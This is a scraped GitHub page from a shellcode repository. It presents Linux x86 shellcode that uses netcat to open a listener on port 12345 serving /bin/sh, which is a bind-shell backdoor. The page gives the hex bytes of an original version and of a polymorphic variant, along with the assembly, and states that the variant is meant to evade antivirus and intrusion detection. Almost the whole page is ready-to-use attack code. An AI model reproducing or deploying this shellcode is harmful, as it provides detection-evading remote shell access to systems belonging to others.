Shellcode/x86_backdoor_polymorphic at master · xophidia/Shellcode · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
-----------------------------------------------
Open a listener on 12345 with nc - Polymorphic
-----------------------------------------------

By Xophidia - 2016
Platform: Linux / x86

One way to avoid AV and IDS is to use polymorphic shellcode


Before :
--------

Length : 57

"\x31\xc0\x68\x32\x33\x34\x35\x68\x2d\x76\x70\x31\x89\xe2\x50\x68\x6e\x2f\x73\x68"
"\x68\x65\x2f\x62\x69\x68\x2d\x6c\x76\x76\x89\xe1\x50\x68\x2f\x2f\x6e\x63\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x52\x51\x53\x31\xd2\x89\xe1\xb0\x0b\xcd\x80"

After :
------

Length : 102

"\x31\xc0\xc7\x44\x24\xfc\x32\x33\x34\x35\xc7\x44\x24\xf8\x2d\x76\x70\x31\x83\xec"
"\x08\x89\xe2\x50\xc7\x44\x24\xfc\x6e\x2f\x73\x68\xc7\x44\x24\xf8\x65\x2f\x62\x69"
"\xc7\x44\x24\xf4\x2d\x6c\x76\x76\x83\xec\x0c\x89\xe1\x50\xc7\x44\x24\xfc\x2f\x2f"
"\x6e\x63\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\x89\x44\x24\xfc\x89"
"\x54\x24\xf8\x89\x4c\x24\xf4\x89\x5c\x24\xf0\x83\xec\x10\x31\xd2\x89\xe1\xb0\x0b"
"\xcd\x80"


Howto:

xor    eax,eax
mov    DWORD PTR [esp-0x4],0x35343332
mov    DWORD PTR [esp-0x8],0x3170762d
sub    esp,0x8
mov    edx,esp
mov    DWORD PTR [esp-0x4],0x68732f6e
mov    DWORD PTR [esp-0x8],0x69622f65
mov    DWORD PTR [esp-0xc],0x76766c2d
sub    esp,0xc
mov    ecx,esp
push   eax
mov    DWORD PTR [esp-0x4],0x636e2f2f
mov    DWORD PTR [esp-0x8],0x6e69622f
sub    esp,0x8
mov    ebx,esp
mov    DWORD PTR [esp-0x4],eax
mov    DWORD PTR [esp-0x8],edx
mov    DWORD PTR [esp-0xc],ecx
mov    DWORD PTR [esp-0x10],ebx
sub    esp,0x10
xor    edx,edx
mov    ecx,esp
mov    al,0xb
int    0x80